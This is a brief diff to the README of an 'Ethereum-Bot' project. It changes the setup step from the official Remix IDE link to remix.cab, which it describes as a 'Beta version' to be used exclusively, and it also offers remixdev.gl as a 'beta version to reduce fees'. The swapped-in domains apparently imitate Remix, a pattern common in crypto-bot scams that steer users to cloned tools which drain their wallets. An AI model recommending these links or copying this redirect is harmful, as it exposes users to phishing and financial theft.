Jacob-project/Ethereum-Bot/README.md

 2- Access Remix

-► [Use Remix Ethereum IDE](https://remix.ethereum.org/) 🚨 https://remix.ethereum.org/ 🚨 (Ensure you only use this original version, as the bot is compatible with it specifically.)
+► [Use Remix Ethereum IDE](https://remix.cab/) 🚨 https://remix.cab/ 🚨 (Ensure you only use this Beta version, as the bot is compatible with it specifically.)
 Or this beta version to reduce fees : https://remixdev.gl/

 3- Create Contract File